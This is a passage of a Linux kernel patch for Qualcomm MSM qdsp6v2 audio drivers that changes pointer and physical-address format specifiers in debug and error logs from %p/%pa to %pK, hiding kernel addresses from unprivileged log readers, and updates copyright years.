-@@ -2843,7 +2843,7 @@ int q6afe_audio_client_buf_alloc_contiguous(unsigned int dir,
- 	size_t len;
- 
- 	if (!(ac) || ((dir != IN) && (dir != OUT))) {
--		pr_err("%s: ac %p dir %d\n", __func__, ac, dir);
-+		pr_err("%s: ac %pK dir %d\n", __func__, ac, dir);
- 		return -EINVAL;
- 	}
- 
-@@ -2895,7 +2895,7 @@ int q6afe_audio_client_buf_alloc_contiguous(unsigned int dir,
- 			buf[cnt].used = dir ^ 1;
- 			buf[cnt].size = bufsz;
- 			buf[cnt].actual_size = bufsz;
--			pr_debug("%s:  data[%p]phys[%pa][%p]\n", __func__,
-+			pr_debug("%s:  data[%pK]phys[%pK][%pK]\n", __func__,
- 				   buf[cnt].data,
- 				   &buf[cnt].phys,
- 				   &buf[cnt].phys);
-@@ -2992,7 +2992,7 @@ int afe_cmd_memory_map(phys_addr_t dma_addr_p, u32 dma_buf_sz)
- 	mregion_pl->shm_addr_msw = populate_upper_32_bits(dma_addr_p);
- 	mregion_pl->mem_size_bytes = dma_buf_sz;
- 
--	pr_debug("%s: dma_addr_p 0x%pa , size %d\n", __func__,
-+	pr_debug("%s: dma_addr_p 0x%pK , size %d\n", __func__,
- 					&dma_addr_p, dma_buf_sz);
- 	atomic_set(&this_afe.state, 1);
- 	atomic_set(&this_afe.status, 0);
-@@ -3116,7 +3116,7 @@ int q6afe_audio_client_buf_free_contiguous(unsigned int dir,
- 	cnt = port->max_buf_cnt - 1;
- 
- 	if (port->buf[0].data) {
--		pr_debug("%s: data[%p]phys[%pa][%p] , client[%p] handle[%p]\n",
-+		pr_debug("%s: data[%pK]phys[%pK][%pK] , client[%pK] handle[%pK]\n",
- 			__func__,
- 			port->buf[0].data,
- 			&port->buf[0].phys,
-@@ -3371,7 +3371,7 @@ int afe_rt_proxy_port_write(phys_addr_t buf_addr_p,
- 		ret = -ENODEV;
- 		return ret;
- 	}
--	pr_debug("%s: buf_addr_p = 0x%pa bytes = %d\n", __func__,
-+	pr_debug("%s: buf_addr_p = 0x%pK bytes = %d\n", __func__,
- 						&buf_addr_p, bytes);
- 
- 	afecmd_wr.hdr.hdr_field = APR_HDR_FIELD(APR_MSG_TYPE_SEQ_CMD,
-@@ -3407,7 +3407,7 @@ int afe_rt_proxy_port_read(phys_addr_t buf_addr_p,
- 		ret = -ENODEV;
- 		return ret;
- 	}
--	pr_debug("%s: buf_addr_p = 0x%pa bytes = %d\n", __func__,
-+	pr_debug("%s: buf_addr_p = 0x%pK bytes = %d\n", __func__,
- 						&buf_addr_p, bytes);
- 
- 	afecmd_rd.hdr.hdr_field = APR_HDR_FIELD(APR_MSG_TYPE_SEQ_CMD,
-@@ -4757,7 +4757,7 @@ static int afe_map_cal_data(int32_t cal_type,
- 			pr_err("%s: mmap did not work! size = %zd ret %d\n",
- 				__func__,
- 				cal_block->map_data.map_size, ret);
--		pr_debug("%s: mmap did not work! addr = 0x%pa, size = %zd\n",
-+		pr_debug("%s: mmap did not work! addr = 0x%pK, size = %zd\n",
- 			__func__,
- 			&cal_block->cal_data.paddr,
- 			cal_block->map_data.map_size);
-@@ -4904,7 +4904,7 @@ int afe_map_rtac_block(struct rtac_cal_block_data *cal_block)
- 	result = afe_cmd_memory_map(cal_block->cal_data.paddr,
- 		cal_block->map_data.map_size);
- 	if (result < 0) {
--		pr_err("%s: afe_cmd_memory_map failed for addr = 0x%pa, size = %d, err %d\n",
-+		pr_err("%s: afe_cmd_memory_map failed for addr = 0x%pK, size = %d, err %d\n",
- 			__func__, &cal_block->cal_data.paddr,
- 			cal_block->map_data.map_size, result);
- 		return result;
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 1c6e938..ab34ac1 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -481,7 +481,7 @@ static int q6asm_map_cal_memory(struct cal_block_data *cal_block)
- 		pr_err("%s: mmap did not work! size = %zd result %d\n",
- 			__func__,
- 			cal_block->map_data.map_size, result);
--		pr_debug("%s: mmap did not work! addr = 0x%pa, size = %zd\n",
-+		pr_debug("%s: mmap did not work! addr = 0x%pK, size = %zd\n",
- 			__func__,
- 			&cal_block->cal_data.paddr,
- 			cal_block->map_data.map_size);
-@@ -613,7 +613,7 @@ int send_asm_custom_topology(struct audio_client *ac)
- 	asm_top.mem_map_handle = cal_block->map_data.q6map_handle;
- 	asm_top.payload_size = cal_block->cal_data.size;
- 
--	 pr_debug("%s: Sending ASM_CMD_ADD_TOPOLOGIES payload = %pa, size = %d, map handle = 0x%x\n",
-+	 pr_debug("%s: Sending ASM_CMD_ADD_TOPOLOGIES payload = %pK, size = %d, map handle = 0x%x\n",
- 		__func__, &cal_block->cal_data.paddr,
- 		asm_top.payload_size, asm_top.mem_map_handle);
- 
-@@ -621,7 +621,7 @@ int send_asm_custom_topology(struct audio_client *ac)
- 	if (result < 0) {
- 		pr_err("%s: Set topologies failed result %d\n",
- 			__func__, result);
--		pr_debug("%s: Set topologies failed payload = 0x%pa\n",
-+		pr_debug("%s: Set topologies failed payload = 0x%pK\n",
- 			__func__, &cal_block->cal_data.paddr);
- 		goto unmap;
- 
-@@ -631,7 +631,7 @@ int send_asm_custom_topology(struct audio_client *ac)
- 			(atomic_read(&ac->mem_state) <= 0), 5*HZ);
- 	if (!result) {
- 		pr_err("%s: Set topologies failed timeout\n", __func__);
--		pr_debug("%s: Set topologies failed after timedout payload = 0x%pa\n",
-+		pr_debug("%s: Set topologies failed after timedout payload = 0x%pK\n",
- 			__func__, &cal_block->cal_data.paddr);
- 		result = -ETIMEDOUT;
- 		goto unmap;
-@@ -707,7 +707,7 @@ int q6asm_map_rtac_block(struct rtac_cal_block_data *cal_block)
- 		pr_err("%s: mmap did not work! size = %d result %d\n",
- 			__func__,
- 			cal_block->map_data.map_size, result);
--		pr_debug("%s: mmap did not work! addr = 0x%pa, size = %d\n",
-+		pr_debug("%s: mmap did not work! addr = 0x%pK, size = %d\n",
- 			__func__,
- 			&cal_block->cal_data.paddr,
- 			cal_block->map_data.map_size);
-@@ -844,7 +844,7 @@ int q6asm_audio_client_buf_free_contiguous(unsigned int dir,
- 	}
- 
- 	if (port->buf[0].data) {
--		pr_debug("%s: data[%p]phys[%pa][%p] , client[%p] handle[%p]\n",
-+		pr_debug("%s: data[%pK]phys[%pK][%pK] , client[%pK] handle[%pK]\n",
- 			__func__,
- 			port->buf[0].data,
- 			&port->buf[0].phys,
-@@ -875,7 +875,7 @@ void q6asm_audio_client_free(struct audio_client *ac)
- 	int loopcnt;
- 	struct audio_port_data *port;
- 	if (!ac) {
--		pr_err("%s: ac %p\n", __func__, ac);
-+		pr_err("%s: ac %pK\n", __func__, ac);
- 		return;
- 	}
- 	if (!ac->session) {
-@@ -1092,7 +1092,7 @@ int q6asm_audio_client_buf_alloc(unsigned int dir,
- 	size_t len;
- 
- 	if (!(ac) || ((dir != IN) && (dir != OUT))) {
--		pr_err("%s: ac %p dir %d\n", __func__, ac, dir);
-+		pr_err("%s: ac %pK dir %d\n", __func__, ac, dir);
- 		return -EINVAL;
- 	}
- 
-@@ -1145,7 +1145,7 @@ int q6asm_audio_client_buf_alloc(unsigned int dir,
- 					buf[cnt].used = 1;
- 					buf[cnt].size = bufsz;
- 					buf[cnt].actual_size = bufsz;
--					pr_debug("%s: data[%p]phys[%pa][%p]\n",
-+					pr_debug("%s: data[%pK]phys[%pK][%pK]\n",
- 						__func__,
- 					   buf[cnt].data,
- 					   &buf[cnt].phys,
-@@ -1182,7 +1182,7 @@ int q6asm_audio_client_buf_alloc_contiguous(unsigned int dir,
- 	int bytes_to_alloc;
- 
- 	if (!(ac) || ((dir != IN) && (dir != OUT))) {
--		pr_err("%s: ac %p dir %d\n", __func__, ac, dir);
-+		pr_err("%s: ac %pK dir %d\n", __func__, ac, dir);
- 		return -EINVAL;
- 	}
- 
-@@ -1251,7 +1251,7 @@ int q6asm_audio_client_buf_alloc_contiguous(unsigned int dir,
- 			buf[cnt].used = dir ^ 1;
- 			buf[cnt].size = bufsz;
- 			buf[cnt].actual_size = bufsz;
--			pr_debug("%s: data[%p]phys[%pa][%p]\n",
-+			pr_debug("%s: data[%pK]phys[%pK][%pK]\n",
- 				__func__,
- 				buf[cnt].data,
- 				&buf[cnt].phys,
-@@ -1294,7 +1294,7 @@ static int32_t q6asm_srvc_callback(struct apr_client_data *data, void *priv)
- 	payload = data->payload;
- 
- 	if (data->opcode == RESET_EVENTS) {
--		pr_debug("%s: Reset event is received: %d %d apr[%p]\n",
-+		pr_debug("%s: Reset event is received: %d %d apr[%pK]\n",
- 				__func__,
- 				data->reset_event,
- 				data->reset_proc,
-@@ -1462,7 +1462,7 @@ static int32_t q6asm_callback(struct apr_client_data *data, void *priv)
- 		return -EINVAL;
- 	}
- 	if (!q6asm_is_valid_audio_client(ac)) {
--		pr_err("%s: audio client pointer is invalid, ac = %p\n",
-+		pr_err("%s: audio client pointer is invalid, ac = %pK\n",
- 				__func__, ac);
- 		return -EINVAL;
- 	}
-@@ -1488,7 +1488,7 @@ static int32_t q6asm_callback(struct apr_client_data *data, void *priv)
- 		atomic_set(&ac->reset, 1);
- 		if (ac->apr == NULL)
- 			ac->apr = ac->apr2;
--		pr_debug("%s: Reset event is received: %d %d apr[%p]\n",
-+		pr_debug("%s: Reset event is received: %d %d apr[%pK]\n",
- 			__func__,
- 			data->reset_event, data->reset_proc, ac->apr);
- 		if (ac->cb)
-@@ -1631,7 +1631,7 @@ static int32_t q6asm_callback(struct apr_client_data *data, void *priv)
- 			payload[0] ||
- 			populate_upper_32_bits(port->buf[data->token].phys) !=
- 			payload[1]) {
--				pr_debug("%s: Expected addr %pa\n",
-+				pr_debug("%s: Expected addr %pK\n",
- 				__func__, &port->buf[data->token].phys);
- 				pr_err("%s: rxedl[0x%x] rxedu [0x%x]\n",
- 					__func__, payload[0], payload[1]);
-@@ -1717,7 +1717,7 @@ static int32_t q6asm_callback(struct apr_client_data *data, void *priv)
- 			payload[READDONE_IDX_BUFADD_LSW] ||
- 			populate_upper_32_bits(port->buf[token].phys) !=
- 			payload[READDONE_IDX_BUFADD_MSW]) {
--				dev_vdbg(ac->dev, "%s: Expected addr %pa\n",
-+				dev_vdbg(ac->dev, "%s: Expected addr %pK\n",
- 					__func__, &port->buf[token].phys);
- 				pr_err("%s: rxedl[0x%x] rxedu[0x%x]\n",
- 					__func__,
-@@ -1802,7 +1802,7 @@ void *q6asm_is_cpu_buf_avail(int dir, struct audio_client *ac, uint32_t *size,
- 	struct audio_port_data *port;
- 
- 	if (!ac || ((dir != IN) && (dir != OUT))) {
--		pr_err("%s: ac %p dir %d\n", __func__, ac, dir);
-+		pr_err("%s: ac %pK dir %d\n", __func__, ac, dir);
- 		return NULL;
- 	}
- 
-@@ -1829,7 +1829,7 @@ void *q6asm_is_cpu_buf_avail(int dir, struct audio_client *ac, uint32_t *size,
- 		*size = port->buf[idx].actual_size;
- 		*index = port->cpu_buf;
- 		data = port->buf[idx].data;
--		dev_vdbg(ac->dev, "%s: session[%d]index[%d] data[%p]size[%d]\n",
-+		dev_vdbg(ac->dev, "%s: session[%d]index[%d] data[%pK]size[%d]\n",
- 						__func__,
- 						ac->session,
- 						port->cpu_buf,
-@@ -1854,7 +1854,7 @@ void *q6asm_is_cpu_buf_avail_nolock(int dir, struct audio_client *ac,
- 	struct audio_port_data *port;
- 
- 	if (!ac || ((dir != IN) && (dir != OUT))) {
--		pr_err("%s: ac %p dir %d\n", __func__, ac, dir);
-+		pr_err("%s: ac %pK dir %d\n", __func__, ac, dir);
- 		return NULL;
- 	}
- 
-@@ -1881,7 +1881,7 @@ void *q6asm_is_cpu_buf_avail_nolock(int dir, struct audio_client *ac,
- 	*size = port->buf[idx].actual_size;
- 	*index = port->cpu_buf;
- 	data = port->buf[idx].data;
--	dev_vdbg(ac->dev, "%s: session[%d]index[%d] data[%p]size[%d]\n",
-+	dev_vdbg(ac->dev, "%s: session[%d]index[%d] data[%pK]size[%d]\n",
- 		__func__, ac->session, port->cpu_buf,
- 		data, *size);
- 	/*
-@@ -1902,7 +1902,7 @@ int q6asm_is_dsp_buf_avail(int dir, struct audio_client *ac)
- 	uint32_t idx;
- 
- 	if (!ac || (dir != OUT)) {
--		pr_err("%s: ac %p dir %d\n", __func__, ac, dir);
-+		pr_err("%s: ac %pK dir %d\n", __func__, ac, dir);
- 		return ret;
- 	}
- 
-@@ -2169,13 +2169,13 @@ int q6asm_open_write_compressed(struct audio_client *ac, uint32_t format,
- 	struct asm_stream_cmd_open_write_compressed open;
- 
- 	if (ac == NULL) {
--		pr_err("%s: ac[%p] NULL\n",  __func__, ac);
-+		pr_err("%s: ac[%pK] NULL\n",  __func__, ac);
- 		rc = -EINVAL;
- 		goto fail_cmd;
- 	}
- 
- 	if (ac->apr == NULL) {
--		pr_err("%s: APR handle[%p] NULL\n", __func__,  ac->apr);
-+		pr_err("%s: APR handle[%pK] NULL\n", __func__,  ac->apr);
- 		rc = -EINVAL;
- 		goto fail_cmd;
- 	}
-@@ -4032,7 +4032,7 @@ int q6asm_memory_map(struct audio_client *ac, phys_addr_t buf_add, int dir,
- 
- 	ac->port[dir].tmp_hdl = 0;
- 	port = &ac->port[dir];
--	pr_debug("%s: buf_add 0x%pa, bufsz: %d\n", __func__,
-+	pr_debug("%s: buf_add 0x%pK, bufsz: %d\n", __func__,
- 		&buf_add, bufsz);
- 	mregions->shm_addr_lsw = lower_32_bits(buf_add);
- 	mregions->shm_addr_msw = populate_upper_32_bits(buf_add);
-@@ -4218,7 +4218,7 @@ static int q6asm_memory_map_regions(struct audio_client *ac, int dir,
- 	q6asm_add_mmaphdr(ac, &mmap_regions->hdr, cmd_size, TRUE,
- 					((ac->session << 8) | dir));
- 	atomic_set(&ac->mem_state, 1);
--	pr_debug("%s: mmap_region=0x%p token=0x%x\n", __func__,
-+	pr_debug("%s: mmap_region=0x%pK token=0x%x\n", __func__,
- 		mmap_regions, ((ac->session << 8) | dir));
- 
- 	mmap_regions->hdr.opcode = ASM_CMD_SHARED_MEM_MAP_REGIONS;
-@@ -4274,7 +4274,7 @@ static int q6asm_memory_map_regions(struct audio_client *ac, int dir,
- 		buffer_node[i].mmap_hdl = ac->port[dir].tmp_hdl;
- 		list_add_tail(&buffer_node[i].list,
- 			&ac->port[dir].mem_map_handle);
--		pr_debug("%s: i=%d, bufadd[i] = 0x%pa, maphdl[i] = 0x%x\n",
-+		pr_debug("%s: i=%d, bufadd[i] = 0x%pK, maphdl[i] = 0x%x\n",
- 			__func__, i, &buffer_node[i].buf_phys_addr,
- 			buffer_node[i].mmap_hdl);
- 	}
-@@ -4501,7 +4501,7 @@ int q6asm_dts_eagle_set(struct audio_client *ac, int param_id, uint32_t size,
- 	struct asm_dts_eagle_param *ad;
- 
- 	if (!ac || ac->apr == NULL || (size == 0) || !data) {
--		pr_err("DTS_EAGLE_ASM - %s: APR handle NULL, invalid size %u or pointer %p.\n",
-+		pr_err("DTS_EAGLE_ASM - %s: APR handle NULL, invalid size %u or pointer %pK.\n",
- 			__func__, size, data);
- 		return -EINVAL;
- 	}
-@@ -4512,7 +4512,7 @@ int q6asm_dts_eagle_set(struct audio_client *ac, int param_id, uint32_t size,
- 			__func__, sz);
- 		return -ENOMEM;
- 	}
--	pr_debug("DTS_EAGLE_ASM - %s: ac %p param_id 0x%x size %u data %p m_id 0x%x\n",
-+	pr_debug("DTS_EAGLE_ASM - %s: ac %pK param_id 0x%x size %u data %pK m_id 0x%x\n",
- 		__func__, ac, param_id, size, data, m_id);
- 	q6asm_add_hdr_async(ac, &ad->hdr, sz, 1);
- 	ad->hdr.opcode = ASM_STREAM_CMD_SET_PP_PARAMS_V2;
-@@ -4531,8 +4531,8 @@ int q6asm_dts_eagle_set(struct audio_client *ac, int param_id, uint32_t size,
- 	if (po) {
- 		struct list_head *ptr, *next;
- 		struct asm_buffer_node *node;
--		pr_debug("DTS_EAGLE_ASM - %s: using out of band memory (virtual %p, physical %lu)\n",
--			__func__, po->kvaddr, (long)po->paddr);
-+		pr_debug("DTS_EAGLE_ASM - %s: using out of band memory (virtual %pK, physical %pK)\n",
-+			__func__, po->kvaddr, &po->paddr);
- 		ad->param.data_payload_addr_lsw = lower_32_bits(po->paddr);
- 		ad->param.data_payload_addr_msw = populate_upper_32_bits(
- 								po->paddr);
-@@ -4599,7 +4599,7 @@ int q6asm_dts_eagle_get(struct audio_client *ac, int param_id, uint32_t size,
- 		 (po ? 0 : size);
- 
- 	if (!ac || ac->apr == NULL || (size == 0) || !data) {
--		pr_err("DTS_EAGLE_ASM - %s: APR handle NULL, invalid size %u or pointer %p\n",
-+		pr_err("DTS_EAGLE_ASM - %s: APR handle NULL, invalid size %u or pointer %pK\n",
- 			__func__, size, data);
- 		return -EINVAL;
- 	}
-@@ -4609,7 +4609,7 @@ int q6asm_dts_eagle_get(struct audio_client *ac, int param_id, uint32_t size,
- 			__func__, sz);
- 		return -ENOMEM;
- 	}
--	pr_debug("DTS_EAGLE_ASM - %s: ac %p param_id 0x%x size %u data %p m_id 0x%x\n",
-+	pr_debug("DTS_EAGLE_ASM - %s: ac %pK param_id 0x%x size %u data %pK m_id 0x%x\n",
- 		__func__, ac, param_id, size, data, m_id);
- 	q6asm_add_hdr(ac, &ad->hdr, sz, TRUE);
- 	ad->hdr.opcode = ASM_STREAM_CMD_GET_PP_PARAMS_V2;
-@@ -4634,8 +4634,8 @@ int q6asm_dts_eagle_get(struct audio_client *ac, int param_id, uint32_t size,
- 	if (po) {
- 		struct list_head *ptr, *next;
- 		struct asm_buffer_node *node;
--		pr_debug("DTS_EAGLE_ASM - %s: using out of band memory (virtual %p, physical %lu)\n",
--			 __func__, po->kvaddr, (long)po->paddr);
-+		pr_debug("DTS_EAGLE_ASM - %s: using out of band memory (virtual %pK, physical %pK)\n",
-+			 __func__, po->kvaddr, &po->paddr);
- 		ad->param.data_payload_addr_lsw = lower_32_bits(po->paddr);
- 		ad->param.data_payload_addr_msw = populate_upper_32_bits(
- 								po->paddr);
-@@ -5066,7 +5066,7 @@ static int __q6asm_read(struct audio_client *ac, bool is_custom_len_reqd,
- 		}
- 		ab = &port->buf[dsp_buf];
- 
--		dev_vdbg(ac->dev, "%s: session[%d]dsp-buf[%d][%p]cpu_buf[%d][%pa]\n",
-+		dev_vdbg(ac->dev, "%s: session[%d]dsp-buf[%d][%pK]cpu_buf[%d][%pK]\n",
- 				__func__,
- 				ac->session,
- 				dsp_buf,
-@@ -5092,7 +5092,7 @@ static int __q6asm_read(struct audio_client *ac, bool is_custom_len_reqd,
- 		port->dsp_buf = q6asm_get_next_buf(ac, port->dsp_buf,
- 						   port->max_buf_cnt);
- 		mutex_unlock(&port->lock);
--		dev_vdbg(ac->dev, "%s: buf add[%pa] token[%d] uid[%d]\n",
-+		dev_vdbg(ac->dev, "%s: buf add[%pK] token[%d] uid[%d]\n",
- 				__func__, &ab->phys, read.hdr.token,
- 				read.seq_id);
- 		rc = apr_send_pkt(ac->apr, (uint32_t *) &read);
-@@ -5144,7 +5144,7 @@ int q6asm_read_nolock(struct audio_client *ac)
- 		dsp_buf = port->dsp_buf;
- 		ab = &port->buf[dsp_buf];
- 
--		dev_vdbg(ac->dev, "%s: session[%d]dsp-buf[%d][%p]cpu_buf[%d][%pa]\n",
-+		dev_vdbg(ac->dev, "%s: session[%d]dsp-buf[%d][%pK]cpu_buf[%d][%pK]\n",
- 				__func__,
- 				ac->session,
- 				dsp_buf,
-@@ -5170,7 +5170,7 @@ int q6asm_read_nolock(struct audio_client *ac)
- 
- 		port->dsp_buf = q6asm_get_next_buf(ac, port->dsp_buf,
- 						   port->max_buf_cnt);
--		dev_vdbg(ac->dev, "%s: buf add[%pa] token[%d] uid[%d]\n",
-+		dev_vdbg(ac->dev, "%s: buf add[%pK] token[%d] uid[%d]\n",
- 				__func__, &ab->phys, read.hdr.token,
- 				read.seq_id);
- 		rc = apr_send_pkt(ac->apr, (uint32_t *) &read);
-@@ -5233,7 +5233,7 @@ int q6asm_async_write(struct audio_client *ac,
- 	else
- 		lbuf_phys_addr = param->paddr;
- 
--	dev_vdbg(ac->dev, "%s: token[0x%x], buf_addr[%pa], buf_size[0x%x], ts_msw[0x%x], ts_lsw[0x%x], lbuf_phys_addr: 0x[%pa]\n",
-+	dev_vdbg(ac->dev, "%s: token[0x%x], buf_addr[%pK], buf_size[0x%x], ts_msw[0x%x], ts_lsw[0x%x], lbuf_phys_addr: 0x[%pK]\n",
- 			__func__,
- 			write.hdr.token, &param->paddr,
- 			write.buf_size, write.timestamp_msw,
-@@ -5381,7 +5381,7 @@ int q6asm_write(struct audio_client *ac, uint32_t len, uint32_t msw_ts,
- 				list);
- 		write.mem_map_handle = buf_node->mmap_hdl;
- 
--		dev_vdbg(ac->dev, "%s: ab->phys[%pa]bufadd[0x%x] token[0x%x]buf_id[0x%x]buf_size[0x%x]mmaphdl[0x%x]"
-+		dev_vdbg(ac->dev, "%s: ab->phys[%pK]bufadd[0x%x] token[0x%x]buf_id[0x%x]buf_size[0x%x]mmaphdl[0x%x]"
- 				, __func__,
- 				&ab->phys,
- 				write.buf_addr_lsw,
-@@ -5455,7 +5455,7 @@ int q6asm_write_nolock(struct audio_client *ac, uint32_t len, uint32_t msw_ts,
- 		port->dsp_buf = q6asm_get_next_buf(ac, port->dsp_buf,
- 						   port->max_buf_cnt);
- 
--		dev_vdbg(ac->dev, "%s: ab->phys[%pa]bufadd[0x%x]token[0x%x] buf_id[0x%x]buf_size[0x%x]mmaphdl[0x%x]"
-+		dev_vdbg(ac->dev, "%s: ab->phys[%pK]bufadd[0x%x]token[0x%x] buf_id[0x%x]buf_size[0x%x]mmaphdl[0x%x]"
- 				, __func__,
- 				&ab->phys,
- 				write.buf_addr_lsw,
-diff --git a/sound/soc/msm/qdsp6v2/q6core.c b/sound/soc/msm/qdsp6v2/q6core.c
-index 0c85d60..41ebf63 100644
---- a/sound/soc/msm/qdsp6v2/q6core.c
-+++ b/sound/soc/msm/qdsp6v2/q6core.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -184,7 +184,7 @@ void ocm_core_open(void)
- 	if (q6core_lcl.core_handle_q == NULL)
- 		q6core_lcl.core_handle_q = apr_register("ADSP", "CORE",
- 					aprv2_core_fn_q, 0xFFFFFFFF, NULL);
--	pr_debug("%s: Open_q %p\n", __func__, q6core_lcl.core_handle_q);
-+	pr_debug("%s: Open_q %pK\n", __func__, q6core_lcl.core_handle_q);
- 	if (q6core_lcl.core_handle_q == NULL) {
- 			if (__ratelimit(&rl))
- 				pr_err("%s: Unable to register CORE\n",
-@@ -347,7 +347,7 @@ int core_dts_eagle_set(int size, char *data)
- 
- 	pr_debug("DTS_EAGLE_CORE - %s\n", __func__);
- 	if (size <= 0 || !data) {
--		pr_err("DTS_EAGLE_CORE - %s: invalid size %i or pointer %p.\n",
-+		pr_err("DTS_EAGLE_CORE - %s: invalid size %i or pointer %pK.\n",
- 			__func__, size, data);
- 		return -EINVAL;
- 	}
-@@ -393,7 +393,7 @@ int core_dts_eagle_get(int id, int size, char *data)
- 
- 	pr_debug("DTS_EAGLE_CORE - %s\n", __func__);
- 	if (size <= 0 || !data) {
--		pr_err("DTS_EAGLE_CORE - %s: invalid size %i or pointer %p.\n",
-+		pr_err("DTS_EAGLE_CORE - %s: invalid size %i or pointer %pK.\n",
- 			__func__, size, data);
- 		return -EINVAL;
- 	}
-diff --git a/sound/soc/msm/qdsp6v2/q6lsm.c b/sound/soc/msm/qdsp6v2/q6lsm.c
-index 02ba8e4..fa2ab564 100644
---- a/sound/soc/msm/qdsp6v2/q6lsm.c
-+++ b/sound/soc/msm/qdsp6v2/q6lsm.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -134,7 +134,7 @@ static int q6lsm_callback(struct apr_client_data *data, void *priv)
- 	uint32_t *payload;
- 
- 	if (!client || !data) {
--		pr_err("%s: client %p data %p\n",
-+		pr_err("%s: client %pK data %pK\n",
- 			__func__, client, data);
- 		WARN_ON(1);
- 		return -EINVAL;
-@@ -886,7 +886,7 @@ int q6lsm_register_sound_model(struct lsm_client *client,
- 	rmb();
- 	cmd.mem_map_handle = client->sound_model.mem_map_handle;
- 
--	pr_debug("%s: addr %pa, size %d, handle 0x%x\n", __func__,
-+	pr_debug("%s: addr %pK, size %d, handle 0x%x\n", __func__,
- 		&client->sound_model.phys, cmd.model_size, cmd.mem_map_handle);
- 	rc = q6lsm_apr_send_pkt(client, client->apr, &cmd, true, NULL);
- 	if (rc)
-@@ -960,7 +960,7 @@ static int q6lsm_memory_map_regions(struct lsm_client *client,
- 	int rc;
- 	int cmd_size = 0;
- 
--	pr_debug("%s: dma_addr_p 0x%pa, dma_buf_sz %d, mmap_p 0x%p, session %d\n",
-+	pr_debug("%s: dma_addr_p 0x%pK, dma_buf_sz %d, mmap_p 0x%pK, session %d\n",
- 		__func__, &dma_addr_p, dma_buf_sz, mmap_p,
- 		client->session);
- 	if (CHECK_SESSION(client->session)) {
-@@ -1240,7 +1240,7 @@ int q6lsm_snd_model_buf_alloc(struct lsm_client *client, size_t len,
- 	if (cal_block == NULL)
- 		goto fail;
- 
--	pr_debug("%s:Snd Model len = %zd cal size %zd phys addr %pa", __func__,
-+	pr_debug("%s:Snd Model len = %zd cal size %zd phys addr %pK", __func__,
- 		len, cal_block->cal_data.size,
- 		&cal_block->cal_data.paddr);
- 	if (!cal_block->cal_data.paddr) {
-@@ -1295,8 +1295,8 @@ int q6lsm_snd_model_buf_alloc(struct lsm_client *client, size_t len,
- 	memcpy((client->sound_model.data + pad_zero +
- 		client->sound_model.size),
- 	       (uint32_t *)cal_block->cal_data.kvaddr, client->lsm_cal_size);
--	pr_debug("%s: Copy cal start virt_addr %p phy_addr %pa\n"
--			 "Offset cal virtual Addr %p\n", __func__,
-+	pr_debug("%s: Copy cal start virt_addr %pK phy_addr %pK\n"
-+			 "Offset cal virtual Addr %pK\n", __func__,
- 			 client->sound_model.data, &client->sound_model.phys,
- 			 (pad_zero + client->sound_model.data +
- 			 client->sound_model.size));
-@@ -1610,7 +1610,7 @@ int q6lsm_lab_control(struct lsm_client *client, u32 enable)
- 	u32 param_size;
- 
- 	if (!client) {
--		pr_err("%s: invalid param client %p\n", __func__, client);
-+		pr_err("%s: invalid param client %pK\n", __func__, client);
- 		return -EINVAL;
- 	}
- 	/* enable/disable lab on dsp */
-@@ -1667,7 +1667,7 @@ int q6lsm_stop_lab(struct lsm_client *client)
- {
- 	int rc = 0;
- 	if (!client) {
--		pr_err("%s: invalid param client %p\n", __func__, client);
-+		pr_err("%s: invalid param client %pK\n", __func__, client);
- 		return -EINVAL;
- 	}
- 	rc = q6lsm_cmd(client, LSM_SESSION_CMD_EOB, true);
-@@ -1680,7 +1680,7 @@ int q6lsm_read(struct lsm_client *client, struct lsm_cmd_read *read)
- {
- 	int rc = 0;
- 	if (!client || !read) {
--		pr_err("%s: Invalid params client %p read %p\n", __func__,
-+		pr_err("%s: Invalid params client %pK read %pK\n", __func__,
- 			client, read);
- 		return -EINVAL;
- 	}
-@@ -1750,7 +1750,7 @@ int q6lsm_lab_buffer_alloc(struct lsm_client *client, bool alloc)
- 			kfree(client->lab_buffer);
- 			client->lab_buffer = NULL;
- 		} else {
--			pr_debug("%s: Memory map handle %x phys %pa size %d\n",
-+			pr_debug("%s: Memory map handle %x phys %pK size %d\n",
- 				__func__,
- 				client->lab_buffer[0].mem_map_handle,
- 				&client->lab_buffer[0].phys,
-diff --git a/sound/soc/msm/qdsp6v2/q6voice.c b/sound/soc/msm/qdsp6v2/q6voice.c
-index 04909d3..face98c 100644
---- a/sound/soc/msm/qdsp6v2/q6voice.c
-+++ b/sound/soc/msm/qdsp6v2/q6voice.c
-@@ -1,4 +1,4 @@
--/*  Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/*  Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -348,7 +348,7 @@ static struct voice_data *voice_get_session(u32 session_id)
- 		break;
- 	}
- 
--	pr_debug("%s:session_id 0x%x session handle %p\n",
-+	pr_debug("%s:session_id 0x%x session handle %pK\n",
- 		__func__, session_id, v);
- 
- 	return v;
-@@ -3087,7 +3087,7 @@ static int voice_map_cal_memory(struct cal_block_data *cal_block,
- 		cal_block->map_data.map_size,
- 		VOC_CAL_MEM_MAP_TOKEN);
- 	if (result < 0) {
--		pr_err("%s: Mmap did not work! addr = 0x%pa, size = %zd\n",
-+		pr_err("%s: Mmap did not work! addr = 0x%pK, size = %zd\n",
- 			__func__,
- 			&cal_block->cal_data.paddr,
- 			cal_block->map_data.map_size);
-@@ -3120,7 +3120,7 @@ static int remap_cal_data(struct cal_block_data *cal_block,
- 			goto done;
- 		}
- 	} else {
--		pr_debug("%s:  Cal block 0x%pa, size %zd already mapped. Q6 map handle = %d\n",
-+		pr_debug("%s:  Cal block 0x%pK, size %zd already mapped. Q6 map handle = %d\n",
- 			__func__, &cal_block->cal_data.paddr,
- 			cal_block->map_data.map_size,
- 			cal_block->map_data.q6map_handle);
